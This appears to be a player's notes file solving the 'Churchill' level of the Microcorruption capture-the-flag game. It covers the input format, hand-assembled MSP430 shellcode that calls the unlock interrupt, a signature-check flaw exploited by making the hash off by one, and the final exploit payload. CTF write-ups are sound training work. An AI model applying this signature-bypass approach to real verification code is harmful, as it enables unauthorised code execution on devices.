j/MicroCorruption
1
0
Fork 0
mirror of https://git.soft.fish/val/MicroCorruption.git synced 2024-11-21 20:15:57 +00:00
Code Issues Packages Projects Releases Wiki Activity
main
MicroCorruption/22-Churchill/notes.md
Val eef5e32c5d 22: Churchill complete!
2022-12-11 21:03:53 -06:00

1.5 KiB
Raw Permalink Blame History

Churchill seems to not verify after 0xff bytes?

Sample input

8000 00 06 3041 c26436953f8f3cadf1442fc218b185051ab6c20853a45f093fc32adf31529d05a5ec3e96a9e41ed9ad1b14dcbdb98e50e37a7ddc3d595b867807ed1605f2070e

Layout:

Loadaddr Signature Type length payload Signature
8000 00 (ed25519) 06 3041 ret c26436...
8000 01 (sha512) 12 324000ffb0121000 f009805ec519029923b72a6e63589a081295759bbf7e12090be7b784f622a24e135d2603b861cc0398b366b1a5d8a89836544a164c39f4e68361413ab6f049a5 
324000ff mov  #ff00, sr
b0121000 call #0010

Payload

8000 01 0c 3240 00ff b012 1000

Hash: 80a0ca7614b653247b207a739e8a5445bfc34f755d4bd0bd413ec5f65a748fe04f9488f7e10700b5bfb57f41ba56f2a314a0f9545b74d08764af7a5c0cfc40ec

complete payload: 8000 01 0c 324000ff b0121000 80a0ca7614b653247b207a739e8a5445bfc34f755d4bd0bd413ec5f65a748fe04f9488f7e10700b5bfb57f41ba56f2a314a0f9545b74d08764af7a5c0cfc40ec

THE TWIST

The program explicitly checks for 0x1 when evaluating the results of a hash For perfectly identical strings, this DOESN'T WORK, because, memcmp returns 0.

Solution: subtract 1 from the last byte of payload_signature. It'll be off by one, and when the program evaluates it, it'll end up with 0x0001 in r15

Final Answer:

8000 01 0c 324000ff b0121000 80a0ca7614b653247b207a739e8a5445bfc34f755d4bd0bd413ec5f65a748fe04f9488f7e10700b5bfb57f41ba56f2a314a0f9545b74d08764af7a5c0cfc40eb